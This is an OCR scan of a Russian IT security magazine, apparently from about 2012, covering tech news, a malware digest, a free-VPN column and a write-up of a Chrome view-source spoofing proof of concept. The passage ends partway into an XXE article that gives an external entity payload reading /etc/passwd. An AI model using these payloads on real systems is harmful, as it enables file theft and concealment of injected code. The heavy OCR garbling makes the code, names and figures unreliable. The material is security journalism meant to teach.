схемы: площадь не бол ее 0,13 мм 2 , то есть 0,36x0, 36 мм 
(Лоогріаппесіагеа). Естественно, энергопотребление таких 
чипов будет минимально: отЗ до 52 мкВт на 1 МГц. То есть 
чипы смогут работать от миниатюрной батарейки несколь- 
колет. Также вопящем режиме Сог1ех-М0+ практически 
не расходуетэнергию. Компания с гордостью называет 
Сог1ех-М0+ «самым энергоэффективным микропроцес- 
сором в мире». Новинка потребляетвтри раза меньше 
энергии, чем аналогичные микросхемы. 

Для чего это нужно? Архитектура РІусаІсЬег в будущем 
вполне может стать основой для так называемого «ин- 
тернета вещей» — когда в каждыйзначимый физический 
объект будет встроен микропроцессор и стекТСР/ІР.Тоесть 
шутки про кофеварки и холодильники с выходом в сеть ско- 
ро перестанут быть шутками (впрочем, та кие устройства 
существуютуже сейчас). Также ксети смогутподключиться 
счетчики электричества, медицинское оборудование, 
осветительные приборы и та к дал ее. 



Согсвк*-М0+ 





КОМПАНИЯ АйОВЕ ВЫ- 
ПУСТИЛА БЕСПЛАТНУЮ 
БЕТА-ВЕРСИЮ РН0Т05Н0Р 

СБбдля ѴѴіпсІоѵѵзи МасОБХ. 
Финальная версия СБбтоже 
появится скоро — впервой 
половине года. 




23% ПОЛЬЗОВАТЕЛЕЙ, 
придумывая РШ-код, 
выбираютдату, каждый 
третий выбирает дату своего 
рождения. Таковы данные 
специалистов Кембридж- 
скогоуниверситета. 




ОСНОВНЫМИ ИСТОЧНИКА- 
МИ ОйОБ-АТАК в прошлом 
году стали пользователи 
стран СНГ — Россия (16% 
мирового ОйоБ-трафика) 
иУкраина (12%), сообщила 
КазрегзкуЬаЬ. 




ВІМ ЗАПАТЕНТОВАЛА ТЕХ- 
НОЛОГИЮ разблокировки 
телефона путем отстуки- 
вания пальцем по корпусу 
девайса определенного 
ритма. Распознаватьудары 
будетакселерометр. 




В ПРОШЛОМ КВАРТАЛЕ 
5ЕА6АТЕ опередила ѴѴевІегп 
Оідііаі по объему поставок 
накопителей нажестких 
дисках. Беадаіе отгрузила 
46,9 миллиона НОО,аШ- 
лишь28,5миллиона. 
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КОМПАНИЯ АМР ПРИ0БРЕТАЕТ5ЕАМІСВ0— первопроходца в создании 
микросерверов. Сумма сделки: 334 миллиона долларов. 



\л/\л/\л/.\л/ехІег.ш 



шехьеп 

♦ 



БЕСПРОВОДНАЯ ЗАРЯДКА 
ДЛЯ ЛЮБОГО ТЕЛЕФОНА! 

СПЕЦИАЛИСТЫ ОІШАСЕІ.І. ПРИДУМАЛИ ПОЧТИ 
УНИВЕРСАЛЬНУЮ «ЗАРЯДНУЮ КАРТУ» 

сожалению, беспроводная зарядка сегодня является ско- 
рее игрушкой для гиков, нежели реальным удобством для 
большинства. Исправить эту несправедл и вость пытаются 
разработчики компании йигасеІІ, и, похоже, у них получается. Ком- 
пания решила подойти к проблеме с неожиданной стороны и пред- 
ставила миниатюрную суперплоскую карточку Роѵѵегтаі ѴѴІСС. 
Карта призвана сыграть роль посредника между беспроводным за- 
рядным устройством и практически любым телефоном, смартфоном, 
планшетом и другими гаджетами. Ответна резонный вопрос, куда 
жеона вставляется, прост — под крышкуустройства. Кпримеру,для 
оснащения мобильного телефона функцией беспроводной зарядки 
достаточно просто вставить Роѵѵегтаі ѴѴІСС в телефон так, чтобы 
контакты карточки соприкасалисьс«зарядными» контактамителе- 
фона. Затем можно закрыть крышку и наслаждаться чудесами про- 
гресса. Здесь, конечно, могут возникнуть проблемы — карточка еще 
должна совпастьс контактами гаджета, а крышка аккумуляторного 
отсека закрыться с картой внутри. Тем не менее многим карточка 
подойдет, а вбудущем могут появиться и специальные сменные 
крышки :). Обещают, что стоить карта будет«буквально копейки». 





ЗА2011 ГОД ХАКЕРЫ ВЗЛАМЫВАЛИ СИСТЕМУ НАСА 13 РАЗ 
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ІТ-БЮДЖЕТА ОБЪЕМОМ В 
1,5 МИЛЛИАРДА ДОЛЛ АРОВ 



Электронная книга с доступом в Интернет 
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МЕ6АЫЕѴѴ5 



ЛИНУСТОРВАЛЬД СООБЩИЛ О ВЫХОДЕ ЯДРАЫЫЦХ ВЕРСИИ 3.3, в состав которого вошел код мобильной ОСАпсІгоісІ. 



60061-Е ПРЕДЛОЖИЛА 
ХАКЕРАМ МИЛЛИОН 



КОНКУРС РѴШІЖ ПРОШЕЛ ПО-НОВОМУ 




□ одном из прошлыхномеров мы писалиотом, 
что правилахакерскогосостязания Рѵѵп20ѵѵп 
изменились — в частности, участники теперь не 
обязаны предоставлятьэксплоиты вендорам. Компа- 
нию боодіе такой поворот событий не устроил, поэтому 
«Корпорация Добра» расширила собственную программу 
вознаграждений СЬготіит бесигііу Реѵѵагсіз. Кприме- 
ру,за Обау-эксплоиты СЬготе, РІазЬ, ѴѴіпбоѵѵз и прочие 
теперь будут платить от двадцати до шестидесяти тысяч 
долларов. Всего на выплату вознаграждений за эксплоиты 
на конкурсе Рѵѵпіит компания выделила призовой фонд 
в один миллион долларов США. 

Какпоказала практика, боодіе не прогадала. Втечение 
пяти минутпосле начала Рѵѵп20ѵѵп французская команда 
Ѵиреп бесигііу сумела осуществитьэксплоитдвухуязви- 
мостей СЬготе и полностью взломатьбраузер. Благодаря 
установленному «жучку» в коде СЬготе компания боодіе 
всежесумела выяснить, вчемзаключаласьуязвимость. 
Хотя обычно Ѵиреп приберегают дырки для продажи своим 
клиентам. Нуа входе контеста Рѵѵпіит отличился извест- 
ный специалист по безопасности Сергей Глазунов. На этот 
раз он заработал 60 тысяч долларов, сумев сделать удач- 
ный эксплоит, используя две новыеуязвимости в СЬготе, 
которые скоро будутзакрыты через автообновление. 
Вторым призером Рѵѵпіит стал хакер РіпкіеРіе. 




0т500 до3133,70 
долларов по- 
прежнему пред- 
лагаетсязалюбой 
багвпродукции 
боодіе. Несмотря на 
введениепремииза 
эксплоиты, размер 
вознаграждения 
заобычныеуяз- 
вимости остается 
прежним. 



5АМ5ШМ6 ОАБАХУ ВЕАМ 



СМАРТФОН С ПРОЕКТОРОМ. ДЛЯ ТЕХ, 

КОМУ МАЛООБЫЧНОГО ДИСПЛЕЯ 

ом пан ия батзипдуже пыталась оснастить 
смартфон проектором в 2010 году, но тогда 
батзипд 18520 не снискал особенного успеха 
у пользователей. Южнокорейский производитель пред- 
принимает вторую попытку и представляет батзипд 
баіаху Веат. Оставим за скобками вопрос, зачем в смарт- 
фоне нужен проектор, и посмотрим на характеристики 
устройства. Итак, сначала об основной особенности 
аппарата: яркость проектора равняется Іблюменам, 
и, по данным компании, этого вполне достаточно для 
просмотра изображений высокой четкости размером до 
50 дюймов (125 см) в ширину. Проектор можно использо- 
вать для игр, просмотра видео и статичных изображений, 
когда (или если) четырехдюймового экрана смартфона 
разрешением 800x480 пикселей мало. 

В остальном, нужно признать, конфигурация 
убатвипд баіаху Веат весьма средняя: двухъядерный 
процессор с частотой в 1 ГГц, 768 Мб оперативной памяти, 
четырехдюймовый дисплей с разрешением 800x480 пик- 
селей. Имеютсятакжеб-мегапиксельнаятыловая каме- 
ра и фронтальная ѴбА- камера. В качестве операционной 
системы будет использоваться Апбгоіб 2.3, в то время как 
уже давно входу версия 4.0.3 (правда, компания обещает, 
что ап дейт до 4.0 будет). Внутреннюю память объемом 8 
Гб можно расширить с помощью карточки тісгобО или 
тісгобОНС. Питание смартфона обеспечит батарея ем- 
костью 2000мАч. О стоимости новинки, а также о дате ее 
появления в продаже пока ничего не сообщается. 






ПО ДАННЫМ ЖУРНАЛА Р0КВЕ5, КОМПАНИЯ 50ЫѴ РАБОТАЕТ НАД ИГРОВОЙ КОНСОЛЬЮ 
НОВОГО ПОКОЛЕНИЯ, а АМй разрабатывает графический процессор для этого изделия. На- 
помним, что СРІІ от АМй уже используются в МісгозоКХЬохЗбО и ИіпІепсІоѴѴіі. Таким образом, 
если Бопу выпустит свою новинку в ближайшее время, во всех основных консолях на рынке 
будутиспользоваться решения отАМО. 




ЖЕСТКИЕДИСКИНЕСОБИ- 
РАЮТСЯ ДЕШЕВЕТЬ. Даже 
после полного восстанов- 
ления объемов производ- 
ства НОй будут на 30-40% 
дороже, чем до наводнения 
вТаиланде. 



МІСК050РТ СНИЗИЛ 
ТРЕБОВАНИЯ КЖЕЛЕЗУ 

для ѴѴіпсІоѵѵзРЬопе. Теперь 
минимальная конфигурация 
включает однокристальную 
систему Оиа1сотт7х27а 
и 256 Мб ОЗУ. 
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5ЕА6АТЕРАЗРАБ0ТАЛАТЕХН0Л0ГИЮ НАМИ, обеспечивающую плотность информации в один терабитна квадратный дюйм. 



ТРОЯНСКИЙ МИНИ-ДАЙДЖЕСТ 

НОВОСТИ ИЗ МИРА МАЛ ВАРИ 



омпания «Доктор Веб» сообщила о появле- 
нии но во го троя на -блокировщика, добав- 
ленного в вирусные базы под именем Тго)ап. 
ѴѴіпІоск.5729. Обычно такие трояны используют для 
блокировки входа в ОС приложение, заменяющее со- 
бой стандартную оболочку или файл изегіпіЕехе. По 
совершенно иному, гораздо более простому пути пошли 
авторы Тго)ап.ѴѴіпІоск.5729. Троян скрывается в моди- 
фицированном дистрибутиве программы Агітопеу, 
предназначенной для «накрутки» различных ресурсов 
в играх. Помимо реального установщика Агітопеу, 
инсталлятор содержит три файла: измененный файл 
Іодопиі.ехе с именем іодопиі.ехе (этот файл отвечает 
за демонстрацию графического интерфейса при входе 
пользователя в ѴѴіпсІоѵѵз ХР) и два самораспаковываю- 
щихся архива, содержащих Ьаі-файлы. При загрузке 
инфицированного инсталлятора запускается первый из 
них — раз5ѵѵогсІ_оп.ЬаС Файл содержит набор команд, 
выполняющих проверку ОС: если на жестком диске 
присутствует папка сДизегзѴ вредоносные компо- 
ненты удаляются, еслижетакая папка отсутствует, 
троянец считает, что он запущен в ѴѴіпсІоѵѵзХР. В этом 
случае Тгоіап. ѴѴіпІоск.5729 модифицирует системный 
реестр, под меняя при загрузке ѴѴіпсІоѵѵз стандартный 
Іодопиі.ехе собственным файлом іодопиі.ехе, и ме- 
няет пароль учетной записи ѴѴіпсІоѵѵз для текущего 
пользователя и локальных пользователей с именами 
«абтіп», «асітіпізігаіог», «админ», «администратор». 
Если текущий пользователь работает в ограниченной 
учетной записи, деятельность трояна прекращается. 
Еще один Ьаі-файл — ра55ѵѵогсІ_оН.ЬаІ — удаляет все 
пароли и возвращает в системном реестре оригиналь- 
ное значение ІІІНозІ. Файл іодопиі.ехе представляет 
собой настоящий аутентичный файл Іодопиі.ехе из 
комплекта поставки ѴѴіпсІоѵѵз ХР, в котором с помощью 
редактора ресурсов была изменена стандартная строка 
приветствия ѴѴіпсІоѵѵз на требование отправить платное 
5М5-сообщение. Однако специалисты «Доктор Веб» 
выяснили, что для входа в систему можно использовать 
пароль «Спасибо!» (без кавычек), после чего 
Т гоіа п .ѴѴіп I оск. 5729 автоматически сбросит пароли 
у четных за пи сей. Вот такие вежливые хакеры :). 

О новой версии троянца РІазЬЬаскдля Мае 
05 сообщает компания Іпіедо. РІазЬЬаск ориентирует- 







_ / I, 

Петучт-е пароль, отправив на 
номер 20&7 с тестом сіат 4И53В4 
I Стоимость, № претазшиат ВО руй.) 
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рЦНМІГь ІѴѴСг, 
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ся на ^ѵа -уязви мости в Мае 05 X. Если у пользователя 
устаревшая версия ^ѵа, РІазЬЬаск срабатывает как 
обычно: неуведомляя пользователя и «не отсвечивая», 
он устанавливает себя в систему. Если же версия ^ѵа 
новая, троян старается применить методы социальной 
инженерии, вынуждая пользователя загрузить малварь 
хитростью. Авторытрояна не мудрствуюти просто 
предоставляют пользователям поддельный сертификат, 
выписанный якобы для компании Ар ріе. Новый троян 
РІазЬЬаск.С опасен тем, что способен внедрять в браузе- 
ры и приложения, работающие в Мае 05 X, собственный 
код, что часто вообще приводит к краху приложений. 
Помимо этого, троян размещает свой код в папке/ІІзег/ 
5Ьа гесі, устанавливая тут различные файлы с расшире- 
нием .50. Внедрение кода в приложения необходимо для 
кражи паролей, вводимых пользователями при обраще- 
нии по нескольким целевым доменам, например Соодіе, 
Рау Ра I, системам онлайн-банкинга и другим. 




Междутем количество вредо- 
носных программ для мобильных 
устройствза2011 годвозрослобо- 
л ее чем в шесть раз. Такой вывод 
сделали аналитики «Лаборато- 
рии Касперского», традиционно 
представив отчет«Мобильная 
вирусология». 



ПИСЬМЕННЫЙ ГАДЖЕТ ОТѴУАТЕКМАЫ 




Какой гаджет выбрать, когда ультрабук и самый топовый 
смартфон уже есть? Хорошую ручку! :) Коллекция письменных 
принадлежностей ѴѴаІегтап Ехрегі ІМеѵѵбепегаІіоп — иде- 
альное и эффектное дополнение к твоему индивидуальному 
стилю. Коллекция изготовлена во Франции и представлена 
в новых выразительных цветовых решениях — Таире (серо- 
коричневый цвет) и Веер Вгоѵѵп (темно-коричневый цвет). 
Прекрасным дополнением кэтим стильным изящным ручкам 
послужат также модели йеіихе ВІаск и Веіихе ѴѴИіІе, МеІаІІіс, 
ВІаск ВгіІІіапІ І_асциег и Майе ВІаск І_асциег. Новые модели 
выполнены вклассическом дизайне, сочетая изысканный 
деловой стиль и неповторимую элегантность. 



пз 

со 



о. 



НОВАЯ ѴІЗІІАІ_5ТІЮІ0 



омпания МісгозоЙ выпустила бетку ѴізиаІ 5іисІіо2011. Глав- 
ное новшество, которое ты сразу за метишь, — это убойный, 
хотя поначалу и непривычный интерфейс (в нем теперь есть 
даже темная цветовая схема). Нововведения можно перечислять 
долго, но одними из самых важных стал и новые инструменты для 
разработки Меіго-приложений, в том числе ВІепсІ, с помощью ко- 
торого можно проектировать дизайн приложений на основе НТМІ_/ 
ХАМЬ. Дистрибутив свежей версии этой ЮЕ ищи на нашем диске. 

— МІррздО.' 

ОО Ѵі$иаІ Йисііоіі веа 
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НЕДОЕВ 




КОЛОНКА СТЁПЫ ИЛЬИНА 

ГДЕ ВЗЯТЬ 
БЕСПЛАТНЫЙ ѴРІЧ? 



РАЗГОВОР О ѴРЫ 

Поговорим о ѴРЫ. Практически для всех 
сегодня передавать данные в зашифрованном 
виде — острая необходимость, однако услуга 
ѴРЫ пока не стала по-настоящему массовой. 
Но это только пока. Еще год-два — и такой 
сервис начнут предоставлять те, кто умеет 
убеждать пользователей в необходимости 
заботиться о собственной безопасности, — 
антивирусные компании. Это непростая 
задача — только представь, какая архитек- 
тура нужна, чтобы обеспечить миллионы 
пользователей ѴРІМ'ом, — но ей уже занима- 
ются. Пока же о безопасности своего трафика 
нам приходится думать самим. К счастью, ни 
финансовых, ни временных затрат для этого 
не требуется. 

ДВА ВАРИАНТА СЭКОНОМИТЬ 

Первый вариант — поднять ѴРЫ -сервер 
самому. В качестве дополнительного про- 
фита получаем уверенность, что никто не 
будет логировать запросы и перехватывать 
трафик непосредственно на нем. Тем более 
что выделенным хостом можно обзавестись 
бесплатно: мы уже рассказывали о том, как 
получить дедик в облаке Атагоп и запустить 
там все необходимое для ѴРІ\І-доступа, вос- 
пользовавшись бесплатным тест-драйвом 
провайдера (к слову, в этот раз мы повторяем 
тот же фокус, чтобы поднять свою ловушку 
для сплоитов, — читай статью «Ханипот на 
Атагоп»). Впрочем, кому-то может показать- 
ся, что так заморачиваться — это слишком. 
Нет проблем: второй вариант — воспользо- 
ваться бесплатным ѴРІ\І-провайдером. Мы 
уже не раз упоминали их в нашей рубрике 
ѴѴѴѴѴѴ2. Один из подобных сервисов — Ехраі 
ЭЫеІсІ ( ехраІзЫеІсІ.сот ). Возможно, не стоит 
доверять ему все свои секреты, но исполь- 
зовать в открытой ѴѴі- Рі-сети какого-нибудь 
Макдональдса, где как пить дать один из 
гиковатых соседей включит РігеЗГіеер на 
смоем смартфоне и начнет собирать чужие 
сессии, — самое то :]. С другой стороны, если 
выбирать себе ѴРІ\І-провайдера, то лучше 



остановиться на компании с каким-никаким, 
но именем. Среди авторитетных вендоров 
бесплатный ѴРЫ предоставляет, например, 
Сотосіо. Предлагаю прямо сейчас потратить 
пять минут и получить надежный шифрован- 
ный канал. 



КАК ЭТИМ ПОЛЬЗОВАТЬСЯ? 

1. Регистрируемся в сервисе ( Ьіі.іѵ/сотосіо 
Ігее_удп], выбирая в качествеуслуги план 
«ТшзіСоппесІ Эегѵісе Ргее 1 0 СВ». Это 
бесплатный тариф, у которого срезана часть 
функционала, однако им вполне можно 
пользоваться. 

2 . В личном кабинете нам отображается 
наш сервисный логин и пароль — данные, 
которые необходимо использовать для 
авторизации на ѴРЫ -сервисе, а также 
лицензионный ключ. 

3. Для работы сам Сотосіо предлагаетустано- 
витьфирменный клиент. Поэтому скачива- 
ем нужную версию программы (есть клиент 
под все основные ОС) и устанавливаем ее, 
указав лицензионный ключ. Все, что нужно 
для подключения, — ввести свои сервисные 
логин и пароль. 

4 . На самом деле необходимости устанав- 
ливать клиент от Сотосіо и что-либо еще 
нет. Достаточно создать обычное ѴРІЧ - 
подключение, указав в качестве сервера 
ик2.ѵрп. сотосіо. сот. Серверы ТгіізіСоппесІ 
будутдоступны по РРТР-протоколу. Это 
оченьхорошо, потомучтоты без проблем 
можешьподнятьѴРІЧ налюбом мобильном 
устройстве (например, на АпбгоісІ) — и шиф- 
рованное соединение сразу будет работать. 

5 . Еслиты являешься фанатом ОрепѴРІЧ,то 
опять же хорошая новость: ТгизіСоппесІ 
поддерживаети его. 

КАК ЭТО РАБОТАЕТ? 

В отличие от многих других бесплатных пред- 
ложений, ѴРЫ от Сотосіо работает не только 
стабильно, но и довольно быстро. Скорость 
скачет от 1 до 3 Мбит/с, чего более чем до- 
статочно. Чтобы пользователи не увлекались 



С О МО 0 0 

Г.члііЛ-д ІГпііг Ьг.'ін" 




Скачиваем клиентТгизІСоппесІ 




Используем сервисный логин и пароль для подключения 
кѴРІМ-серверу 

трафиком, Сотосіо установил ограничение: 

10 Гб в месяц. Если зайти в личный кабинет, 
то можно посмотреть, сколько трафика оста- 
лось, а также изучить графики его потребле- 
ния. Бесплатные тарифы обычно ограничи- 
вают юзеров в возможности использовать 
разные протоколы. Этим грешит и Сотосіо, но 
большинство необходимых для работы про- 
токолов все-таки работает (кроме разве что 
РТР). Еще одним недостатком является навяз- 
чивый сііѵ с рекламой, который вставляется на 
каждую страницу, но и он легко вырезается 
любой баннерорезкой. Красота! :) ц-ц 
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" РгооГоГСопсер* 

Ш ПОДМЕНИТЬ ИСХОДНЫЙ ТЕКСТ СТРАНИЦЫ 



КАК это выглядит? 

Посмотреть, какустроена клиентская часть веб-приложения 
(та, которая отображается в браузере), очень просто: для этого 
на любой странице можно нажать «Просмотр кода страницы» 
и получить ее полный исходник (НТМІ_/С55/Э5-код). Но попробуй 
в СИготе'е открыть ссылку кигІак.сот/щЬп/зоигсе.І-іітІ и по- 
смотреть ее сорец. Когда на странице четко отображается вопрос 
«Сап уои ѵіеѵѵ ту зоигсе Ітот СЬготе?», то при запросе исход- 
ника отображается издевательская фраза «Уои сап, Ьи* по* *Ьа* 
е а з і I у . . . » . Что за дела? Исследователю Джону Курлаку удалось 
проспуфить исходник веб-страницы! Это может показаться не- 
винной шалостью, но на самом деле представляет собой довольно 
изящный хак. Ведь если кто-то подозревает, что на его страницу 
был каким-то образом внедрен посторонний зловредный код, то, 
открыв вот так в браузере ее исходник, он увидит ровно то, что 
захочет показать ему злоумышленник! 

КАК ЭТО РАБОТАЕТ? 

В основе хака лежит новая фича ЭаѵаВсгір* — функция 
Ыз*огу.герІасе5*а*е(). Она позволяет разработчику изменить ІІРІ_ 
страницы без перезагрузки последней. К примеру, можно исполь- 
зовать данную функцию, чтобы поменять ІІРІ_ страницы с 

ѵтѵу.хакер.ги/ехатрІе.ЬітІ на \л/\л/\л/.хакер.ги/ехатрІе2.Ь*тІ . При 

этом в целях безопасности имя сервера изменить, естественно, 
нельзя — только страницы. 

Джон Курлак, экспериментируя с этой функцией, заметил, что 
если изменить ІІРІ_ страницы и посмотреть ее исходник, то брау- 
зер пытается показать сорцы новой страницы. Соответственно, 
если изменить адрес страницы так, чтобы никто не заметил, мы 
можем подсунуть что угодно в качестве ее исходника! Главное, 
чтобы имя страницы выглядело точно так же. И здесь вспомнил- 
ся старый добрый трюк, использующий ІІпісобе-символ, который 




Исходный код страницы зоигсе. МтІ, реализующей спуфинг 




Описание ЫзІогу.герІасеБІаІеО от МоііІІа 



переворачивает текст наоборот. Он называется «ІеЙ *о г і д М: » 
ПРО) и переставляет символы слева направо. Фишка в том, что 
если разместить его после текста, уже ориентированного слева 
направо, то никаких преобразований не происходит. Соответ- 
ственно, мы можем переадресовать пользователя на другую 
страницу, которая пользователю будет отображаться точно так 
же (например, зоигсе. Ь*тІ). Символ 1_Р0 можно представить 
в виде десятичного кода 8237. Получаем простой код страницы 
зоигсе. Ь*тІ: 

< ! РОСТУРЕ Ы=т1> 

< ІгЬтІ > 

< ИеасІ > 

<1:і1:1е>5оигсе</1:і1:1е> 

< теі: а сбагзе1:= ,, ІЛР-8 "> 

<зсгі р1= 1:уре= ,, 1:ех1:/]аѵа5сгір1: ,, > 
бІ5І:огу . гед!асе51:а1:е(пи11_, пи11 л 

1 зоигсе. ІгЕтІ ’ + 51:гіп§.-РготСІіагСосІе(8237) ); 
</зсгір1:> 

<У ИеасІ > 

< Ьосіу > 

<р>Сап уои ѵіем ту зоигсе -Ргот СНготе?</р> 

</Ь осІѵ> 

< /Ыіті > 

Когда пользователь открывает страницу зоигсе. Ь*тІ, то 
браузер автоматически меняет адрес страницы на зоигсе. Ь*тІ 
+ ПРО] — ив адресной строке по-прежнему отображается нуж- 
ный нам іпсІех.ЫтІ. Если же посмотреть исходный код страни- 
цы, то браузер пытается отобразить исходник страницы зоигсе. 
Ь*тІа€ (а€ — это представление Ьех-кода символа І_Р0 в А5СІІ). 
При этом никакие спецсимволы нигде не отображаются. Что 
мы делаем? Просто создаем страницу зоигсе. Ь*тІа€ с нужным 
нам содержанием, которое будет отображаться пользователю 
в виде исходника. Бинго! Прочитать авторский пост на тему, 
скачать исходники и посмотреть демонстрацию ты можешь 
здесь: аоо.аІ/і*6Ѵг . И-И 
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Андрей Петухов (апсІгереІикНоѵлл/огсІргезз.сот) 
Николай Матюнин (таіуипіп.пйдтаіі.сопгі) 




Опасная 

разметка 

С одной стороны, тема ХМІ_ іпіесііоп — это жуткий баян, 
а с другой — она так популярна, что баги такого типа 
присутствовали во многих Х-конкурсах последнего 
времени, например ХегоЫідбІз НаскСіиезІ и месяце поиска 
уязвимостей в Яндексе. В этой статье мы постарались собрать 
и систематизировать все, что известно об ХМІ_ іпіесііоп на 
данный момент. 



НАСТОЛЬНЫЙ 
СПРАВОЧНИК ПО 
АТАКАМ НАХМЬ- 
ПРИЛОЖЕНИЯ 
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Опасная разметка 



ЧАСТЬ ПЕРВАЯ, ТЕОРЕТИЧЕСКАЯ 



Начнем издалека. Стандартом определены два уровня правиль- 
ности документа ХМІ_: 

1. Правильно построенный (ѵѵеіі-^огтесі) документ. Такой доку- 
мент соответствует общим правилам синтаксиса ХМ І_, примени- 
мым клюбомуХМІ_-документу. И если, например, начальныйтег 
не имеет соответствующего ему конечного тега, то это непра- 
вильно построенный ХМ І_. 

2. Действительный (ѵаіісі) документ. Действительный документ 
дополнительно соответствует некоторым семантическим пра- 
вилам. Это более строгая проверка корректности документа на 
соответствие заранее определенным, но уже внешним прави- 
лам. Эти правила описывают структуру документа: допустимые 
названия элементов, их последовательность, названия атри- 
бутов, их тип и тому подобное. Обычно такие правила хранятся 
в отдельных файлах специального формата — схемах. 

Основные форматы определения правил валидности ХМІ_- 
документов — это йЮ Шоситепі Туре йеПпШоп) и ХМІ_ БсЬета. 
Остановимся на РЮ. Стандартом предусмотрено два варианта 
связывания документа с его схемой: либо через ссылку на схему 
в заголовке ХМІ_-документа (этот заголовок называется Ооситепі 
Туре Оесіагаііоп): 

<?хт! ѵег5Іоп="1.Ѳ" епсос!іп^="ЦТР-8" ?> 

< ! РОСТУРЕ огсіег 5У5ТЕМ "огсіег .сІ1:сГ> 

<огс!ег> 

<ргос!ис1=>1234</ргосІис1=> 

<соигѵЕ>1< / соипі > 

</огс!ег> 

либо через описание схемы в документе іпііпе (аналогия: подклю- 
чение СББ через ссылку или іпііпе): 

<?хш1 ѵег5Іоп="1.Ѳ" епсосИ.п§="1)ТР-8" ?> 

<! РОСТУРЕ огсіег [ 

< ! ЕІ-ЕМЕІМТ соигтЕ (#РСРАТА)> 

< ! ЕІ-ЕМЕІМТ ргосіисі: (#РСРАТАЪ 

<! ЕІ.ЕМЕІМТ огсіег (ргосіисі:. соипі: )> 

1^_ 

<ог<Зег> 

<ргос!ис1:>1234</ргосІис1:> 

<соип1=>1</соип1:> 

</огс!ег> 

Самое интересное в йЮ — это то, что умные люди придума- 
ли так называемые сущности. Придумали, чтобы можно было 
подключать часто используемые фрагменты ХМІ_-документов по 
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Успешное разрешение внешней сущности, указывающей на /еіс/раззѵѵсі 



имени. Сущность определяется в РТР через директиву <!ЕІМТІТѴ 
паше и ѵа1ие"> и используется в документе как &пате;. А потом 
кто-то подумал, что глобализация должна быть глобальной, 
и придумал еще и внешние сущности (ехіегпаі епііііез). Напри- 
мер, можно определить внешнюю сущность сиггепі-сіаіе: 



< ! ЕІМТІТУ сиггепіі-сіаііе 5У5ТЕМ 

"ІтЕір: //мм. ^еісиггепіііте. сот/іітезіатр.хтГ^ 



и перенести логику по вычислению текущей даты и времени на 
внешний сервис. Предположим, что сервис возвращает ответ 
типа: 



<1=іте5І=атр>2Ѳ12-05-01 Т 11:20:29 ІІТС</1=іте5І=атр> 



Соответственно, наш пример с добавлением текущей даты за- 
каза перепишется так: 



<?хш1 ѵегзіоп="1.Ѳ"?> 

<! РОСТУРЕ огсіег [ 

< ! ЕІ-ЕМЕІМТ соипі: (#РСРАТА)> 

< ! ЕІ-ЕМЕІМТ ргосіисі: (#РСРАТА)> 

< ! ЕІ-ЕМЕІМТ сіаііе (іітезіатрЪ 

< ! ЕІ-ЕМЕІМТ іітезіатр (#РСРАТАЪ 

< ! ЕЬЕМЕМТ огсіег (ргосіисі:. соипі:. сіаііе Т > 

< ! ЕІМТІТУ сиггепіі-сіаііе 5У5ТЕМ 

"ІтЕір: //мм. %еіси г гепіііте. сот/іітезіатр.хтГ^ 

р 

<огс!ег> 

<ргос!ис1=>1234</рпосІис1=> 

<соип1:>1</соип1=> 

<с!а1:е>&сиггеп1: -сіаіе ; </с!а1=е> 



ПОПУЛЯРНЫЕ ХМЬПАРСЕРЫ 



Интерпретируемые языки 

(РНР, РегІ # РуІЬоп, ПиЬу и другие): 

• большинство парсеров испол ьзуют библио- 
теки ІіЬхтІ2( , последняя версия 

— 2.7.8) и МЬхзИ: ( ); 

• некоторые парсеры используютдругие 
библиотеки (например, модульехраі- 
ХМІ_::Рагзегв РегІ используетбиблиотеку 
ЕхраІХМІ. Рагзег) либо полностью реализу- 
ются на«родном»языке (например, парсер 
РЕХМІ. в РиЬу). 



Эаѵа: 

• АрасЬеХегсез: послед- 

няя версия — 2.11.0; 

• (дляХ5І_Т) АрасЬеХаІап-Эаѵа: 

, последняя версия — 2.7.1; 

• работасХМІ_-парсерами вЭаѵа реализуется 
через общий интерфейс Эаѵа АРИогХМІ. 
Ргосеззіпд (ЭАХР. В раннихверсияхЭаѵа 
через ЭАХР был доступен парсер Сгітзоп от 
Бип). 



ѴѴіпсІоѵѵз-платформа, .МЕТ: 

• в большинстве ѴѴіпсіоѵѵз-приложений (на- 

писанных на РеІрЬі, ЭБсгірІ, ѴВБсгірІ итак 
далее) для обработки ХМ І_ используется 
парсер М5ХМІ_( последняя 

версия — 6. 0 5 Р 2 ) ; 

• в.МЕТ-приложенияхдля парсинга ХМ І_ ис- 
пользуются классы из пространства имен 
БузІепл.ХМІ. (ХплІТехІРеасІег, ХзІТгапз^огт 
и другие). 
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Последний элементтехнологии — парсеры, которые, соб- 
ственно, и разбирают ХМІ_-документы, валидируют их, разрешают 
внешние сущности, реализуют стандартный интерфейс к постро- 
енной объектной модели ШОМ] и тому подобное. Парсеры бывают 
валидирующими и невалидирующими. Вот что сказано в стан- 
дарте о поведении парсера при наличии в документе ссылок на 
внешние сущности: 

« ІАІІіеп ап ХМІ ргосеззог гесодпігез а ге^егепсе іо а 
рагзесі епіііу, іп огсіег іо ѵаШаіе іііе сіоситеп і, іііе 
ргосеззог ігіизі іпсіисіе Из геріасетепі іехі. I/ іііе епіііу 
із ехіегпаі , апсі іііе ргосеззог із поі аііетрііпд іо ѵаШаіе 
іііе ХМІ сіоситеп і, іііе ргосеззог тау , Ьиі пеесі поі, іпсіисіе 
іііе епіііу 'з геріасетепі іехі...» 

Это важно! Тут говорится, что валидирующий парсер обязан 
включить в документ содержимое внешнего файла (логично, 
иначе как парсер проверит правильность структуры документа?), 
а невалидирующий — по желанию. Однако на практике это свой- 
ство «по желанию» выполняется практически у всех популярных 
парсеров. 



ЧАСТЬ ВТОРАЯ, ПЕРЕХОДНАЯ 



Возможность подключения внешних сущностей волнует нас пре- 
жде всего в контексте анализа защищенности веб-приложений. 
Из всего зоопарка протоколов, основанных на ХМІ_, нас будут 
интересовать только популярные: БОАР и ХМЬРРС (краткую 
справку о них ты найдешь во врезках). 

Что бы мы хотели получить в идеале? Конечно, возможность 
чтения локальных файлов вроде этого: 

1. В НТТР-запрос, в котором на сервер передаетсяХМІ_, вставляем 
<!ЕІ\ІТІТѴ ххе 5Ѵ5ТЕМ и б1е:///е1:с/ра55іл/сГ>. 

2 . ВтелеХМЬдокумента даем ссылку на сущность — &ххе,\ 

3. В ответе получаем содержимое локального файла. 

Однако в реальности, как говорится в одном анекдоте, «есть 
нюанс». Прежде всего попробуем рассмотреть ХМІ_-парсеры чуть 
более подробно. Как они обрабатывают внешние сущности по 
умолчанию? 

Есть три класса популярных платформ: .ЫЕТ, Эаѵа и интерпре- 
тируемые языки (РНР, РегІ, РуіЬоп, РиЬу и подобные). Отметим, 
